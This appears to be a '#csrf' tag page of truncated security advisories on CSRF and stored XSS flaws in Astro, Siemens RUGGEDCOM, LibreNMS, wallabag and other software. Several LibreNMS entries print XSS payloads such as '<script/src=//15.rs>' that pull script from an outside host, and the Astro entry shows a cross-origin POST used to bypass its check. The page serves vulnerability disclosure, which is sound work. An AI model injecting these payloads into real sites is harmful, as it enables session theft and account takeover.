Tag
#csrf
### Summary A bug in Astro’s CSRF-protection middleware allows requests to bypass CSRF checks. ### Details When the `security.checkOrigin` configuration option is set to `true`, Astro middleware will perform a CSRF check. (Source code: https://github.com/withastro/astro/blob/6031962ab5f56457de986eb82bd24807e926ba1b/packages/astro/src/core/app/middlewares.ts) For example, with the following Astro configuration: ```js // astro.config.mjs import { defineConfig } from 'astro/config'; import node from '@astrojs/node'; export default defineConfig({ output: 'server', security: { checkOrigin: true }, adapter: node({ mode: 'standalone' }), }); ``` A request like the following would be blocked if made from a different origin: ```js // fetch API or <form action="https://test.example.com/" method="POST"> fetch('https://test.example.com/', { method: 'POST', credentials: 'include', body: 'a=b', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, }); // => Cross-site POST...
As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, see Siemens' ProductCERT Security Advisories (CERT Services | Services | Siemens Global). View CSAF 1. EXECUTIVE SUMMARY CVSS v4 8.6 ATTENTION: Exploitable remotely/low attack complexity Vendor: Siemens Equipment: RUGGEDCOM ROX II Vulnerability: Cross-Site Request Forgery 2. RISK EVALUATION Successful exploitation of this vulnerability could allow an attacker to perform administrative actions if an authenticated user is tricked into accessing a malicious link. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS Siemens that the following products are affected: Siemens RUGGEDCOM ROX RX1500: All versions prior to V2.16.0 Siemens RUGGEDCOM ROX RX1512: All versions prior to V2.16.0 Siemens RUGGEDCOM ROX RX1501: All versions prior to V2.16.0 Siemens RUGGEDCOM ROX MX5000RE: All versions...
Cross-Site Request Forgery (CSRF) in Avenwu Whistle v.2.9.90 and before allows attackers to perform malicious API calls, resulting in the execution of arbitrary code on the victim's machine.
This Metasploit module exploits an improper authorization vulnerability in ProjectSend versions r1295 through r1605. The vulnerability allows an unauthenticated attacker to obtain remote code execution by enabling user registration, disabling the whitelist of allowed file extensions, and uploading a malicious PHP file to the server.
MITRE and CISA's 2024 list of the 25 most dangerous software weaknesses exposes the need for organizations to continue to invest in secure code.
### Summary A Stored Cross-Site Scripting (XSS) vulnerability in the "Custom OID" tab of a device allows authenticated users to inject arbitrary JavaScript through the "unit" parameter when creating a new OID. This vulnerability can lead to the execution of malicious code in the context of other users' sessions, compromising their accounts and enabling unauthorized actions. ### Details When creating a new OID for a device, an attacker can inject an XSS payload into the "unit" parameter. This payload is reflected in the "Unit" column of the table displayed in the "Custom OID" tab of the device. The payload used to exploit this vulnerability is: ```<script/src=//15.rs>``` Note: The payload uses the "15.rs" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code. The vulnerability is due to improper sanitization of the "unit" parameter before rendering it i...
### Summary A Stored Cross-Site Scripting (XSS) vulnerability in the "Port Settings" page allows authenticated users to inject arbitrary JavaScript through the "descr" parameter when editing a device's port settings. This vulnerability can lead to the execution of malicious code when the "Port Settings" page is visited, potentially compromising the user's session and allowing unauthorized actions. ### Details When editing a device's port settings, an attacker can inject the following XSS payload into the "descr" parameter: ```lo'"><script/src=//15.rs>``` Note: The payload uses the "15.rs" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code. The payload triggers when the "Port Settings" page is visited, exploiting the `$port->ifAlias` variable in the application. The sink is located here: https://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345f...
### Summary A Stored Cross-Site Scripting (XSS) vulnerability in the API-Access page allows authenticated users to inject arbitrary JavaScript through the "token" parameter when creating a new API token. This vulnerability can result in the execution of malicious code in the context of other users' sessions, compromising their accounts and enabling unauthorized actions. ### Details The vulnerability occurs when creating a new API Token. An attacker can inject arbitrary JavaScript into the "token" parameter, which is then executed when the API Access page is visited. The payload is triggered twice—once in the "Token Hash" column and once in the "QR Code" column. The payload used to exploit this vulnerability is: `'"><script/src=//15.rs></script>` Note: The payload uses the "15.rs" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code. The vulnerabilit...
wallabag version 2.5.2 contains a Cross-Site Request Forgery (CSRF) vulnerability that allows attackers to arbitrarily delete user accounts via the /account/delete endpoint. This issue is fixed in version 2.5.4.
### Summary A vulnerability exists in the Create User process, allowing the creation of a new admin account with an option to upload a profile image. An attacker can upload a malicious SVG file containing an embedded script. When the profile image is accessed, the embedded script executes, leading to the potential theft of session cookies. ### Details 1. Login as admin 2. Go to Create User 3. Fill up everything in the registration form then upload SVG image as a profile picture 4. In SVG image, add script tag to prepare for XSS attack 5. Complete the Create User process 6. Right click at the image to obtain image URL address 7. XSS triggered ### PoC The below link is a private YouTube video for PoC. https://youtu.be/5j8owD0--1A ### Impact The stored XSS can lead to session hijacking and privilege escalation, effectively bypassing any CSRF protections in place.